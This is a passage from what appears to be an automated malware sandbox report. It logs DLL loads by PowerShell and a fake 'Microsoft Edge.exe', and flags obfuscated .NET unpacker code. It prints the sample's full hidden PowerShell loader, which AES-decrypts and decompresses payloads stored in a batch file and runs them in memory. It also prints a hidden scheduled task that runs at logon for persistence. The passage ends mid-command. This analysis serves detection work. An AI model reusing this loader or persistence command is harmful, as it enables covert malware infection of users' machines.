                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: atl.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: msisip.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: wshext.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: Microsoft Edge.lnk.9.drLNK file: ..\..\..\..\..\Microsoft Edge.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: powershell.pdbUGP source: Microsoft Edge.exe, 00000019.00000000.2861398086.00007FF6CC82A000.00000002.00000001.01000000.0000000A.sdmp, Microsoft Edge.exe.9.dr
                    Source: Binary string: powershell.pdb source: Microsoft Edge.exe, 00000019.00000000.2861398086.00007FF6CC82A000.00000002.00000001.01000000.0000000A.sdmp, Microsoft Edge.exe.9.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t.H1ZbUKHJkH7JxSvJKa3RTPmhLBNfsuLGXnn5M,ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t.hmj6ilgv20QvywM8KIOSR7qBfpDNNk5YUVyiM,ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t.aN3rqCUdEREAvW74ww78M1fm1ZG5QxNkwERO0,ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t._41X2Z4hjuAjJOXE2ZZluJSNUZVoUolIwZs1Mk,VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU._0A0ljVFgeMlo4o7l8NBmzTX0D7ASzX()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ek66VYxJZJQiu7Limf4g9QSdtYrmcmMDZCUXi2UpSe7Xd0eQa1kH72R[2],VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU._46ybOMI9L2UkQN4FKGfxRXhkjY3ulr(Convert.FromBase64String(ek66VYxJZJQiu7Limf4g9QSdtYrmcmMDZCUXi2UpSe7Xd0eQa1kH72R[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t.H1ZbUKHJkH7JxSvJKa3RTPmhLBNfsuLGXnn5M,ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t.hmj6ilgv20QvywM8KIOSR7qBfpDNNk5YUVyiM,ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t.aN3rqCUdEREAvW74ww78M1fm1ZG5QxNkwERO0,ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t._41X2Z4hjuAjJOXE2ZZluJSNUZVoUolIwZs1Mk,VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU._0A0ljVFgeMlo4o7l8NBmzTX0D7ASzX()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ek66VYxJZJQiu7Limf4g9QSdtYrmcmMDZCUXi2UpSe7Xd0eQa1kH72R[2],VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU._46ybOMI9L2UkQN4FKGfxRXhkjY3ulr(Convert.FromBase64String(ek66VYxJZJQiu7Limf4g9QSdtYrmcmMDZCUXi2UpSe7Xd0eQa1kH72R[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t.H1ZbUKHJkH7JxSvJKa3RTPmhLBNfsuLGXnn5M,ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t.hmj6ilgv20QvywM8KIOSR7qBfpDNNk5YUVyiM,ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t.aN3rqCUdEREAvW74ww78M1fm1ZG5QxNkwERO0,ZbFOAZuJjnvcc2qnLIW7HYwda38W4Te5ERUSmngaMZktNmgkTlz5J1n6NpXOCO1703omqATISYj8dgrM8FJUgOaH00Gg40t._41X2Z4hjuAjJOXE2ZZluJSNUZVoUolIwZs1Mk,VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU._0A0ljVFgeMlo4o7l8NBmzTX0D7ASzX()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{ek66VYxJZJQiu7Limf4g9QSdtYrmcmMDZCUXi2UpSe7Xd0eQa1kH72R[2],VlNtKBcw43i9rBoZf8Mn4P5ZVPZugU._46ybOMI9L2UkQN4FKGfxRXhkjY3ulr(Convert.FromBase64String(ek66VYxJZJQiu7Limf4g9QSdtYrmcmMDZCUXi2UpSe7Xd0eQa1kH72R[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    .NET source code contains potential unpacker
                    Source: 2.2.powershell.exe.2752ea29b20.4.raw.unpack, WvRJXwGBcRGXrjFeLUhd.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: 2.2.powershell.exe.2752e96ff18.2.raw.unpack, WvRJXwGBcRGXrjFeLUhd.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: 2.2.powershell.exe.2752e9d9ae8.3.raw.unpack, WvRJXwGBcRGXrjFeLUhd.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: 2.2.powershell.exe.27536c90000.5.raw.unpack, WvRJXwGBcRGXrjFeLUhd.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: HPUoDK9TKpIvQ42reUKN2ZWlw0bIjVDG5r5BO7J989S0ePsFBqQXEHq System.AppDomain.Load(byte[])
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: iaWVKS1zpsMU0XnDLHUurMaBhZMRPNZOY3Y7048hnlUUdJsAQ0C9ok9 System.AppDomain.Load(byte[])
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: iaWVKS1zpsMU0XnDLHUurMaBhZMRPNZOY3Y7048hnlUUdJsAQ0C9ok9
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: HPUoDK9TKpIvQ42reUKN2ZWlw0bIjVDG5r5BO7J989S0ePsFBqQXEHq System.AppDomain.Load(byte[])
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: iaWVKS1zpsMU0XnDLHUurMaBhZMRPNZOY3Y7048hnlUUdJsAQ0C9ok9 System.AppDomain.Load(byte[])
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: iaWVKS1zpsMU0XnDLHUurMaBhZMRPNZOY3Y7048hnlUUdJsAQ0C9ok9
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: HPUoDK9TKpIvQ42reUKN2ZWlw0bIjVDG5r5BO7J989S0ePsFBqQXEHq System.AppDomain.Load(byte[])
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: iaWVKS1zpsMU0XnDLHUurMaBhZMRPNZOY3Y7048hnlUUdJsAQ0C9ok9 System.AppDomain.Load(byte[])
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, ZhKgWggSk8Lw0wQIKoqyr8CJLVNsCl7yb7MWM7NuIa2DHDyupaV1gNiLzddpaXuaGIxy8M.cs.Net Code: iaWVKS1zpsMU0XnDLHUurMaBhZMRPNZOY3Y7048hnlUUdJsAQ0C9ok9
                    Source: 9.2.powershell.exe.13ce7a10e78.5.raw.unpack, WvRJXwGBcRGXrjFeLUhd.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_533_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_533.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] 